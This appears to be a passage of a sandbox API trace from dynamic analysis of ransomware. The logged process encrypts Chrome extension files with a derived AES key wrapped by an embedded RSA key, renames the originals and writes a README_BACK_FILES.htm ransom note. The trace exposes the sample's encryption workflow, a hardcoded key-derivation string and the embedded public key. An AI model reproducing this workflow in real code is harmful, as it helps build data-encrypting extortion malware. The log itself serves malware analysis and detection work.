[0262.455] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.455] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.456] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.456] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.456] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.456] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.456] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.456] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.457] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x33f, lpOverlapped=0x0) returned 1 [0262.457] CryptEncrypt (in: hKey=0x2e7dd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x33f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x340) returned 1 [0262.457] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x340, lpOverlapped=0x0) returned 1 [0262.457] CloseHandle (hObject=0x5d5c) returned 1 [0262.457] CloseHandle (hObject=0x5d60) returned 1 [0262.457] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0262.460] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0262.461] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0262.462] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0262.464] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.464] CryptDestroyKey (hKey=0x2e7dd40) returned 1 [0262.464] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.464] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.464] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.467] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0262.467] AreFileApisANSI () returned 1 [0262.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.467] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.469] GetFileType (hFile=0x5d64) returned 0x1 [0262.469] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.470] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.470] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.470] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.470] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.470] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.470] GetLastError () returned 0x0 [0262.470] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json")) returned 0x20 [0262.470] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0262.471] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.471] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.472] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.472] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.474] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.474] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0262.474] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.474] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7d980) returned 1 [0262.474] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.474] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.474] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e72e88) returned 1 [0262.475] CryptImportPublicKeyInfo (in: hCryptProv=0x2e72e88, dwCertEncodingType=0x1, pInfo=0x2eadd10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eadd40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eadd48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d9c0) returned 1 [0262.475] CryptEncrypt (in: hKey=0x2e7d9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.475] CryptEncrypt (in: hKey=0x2e7d9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e72f10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e72f10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.475] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e72f10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e72f10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.476] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.483] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.483] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.490] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.490] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.490] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.490] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.490] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.491] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.491] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.491] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.491] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.491] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.491] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.492] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.492] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.492] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.492] CryptEncrypt (in: hKey=0x2e7d980, hHash=0x0, Final=0, dwFlags=0x0, 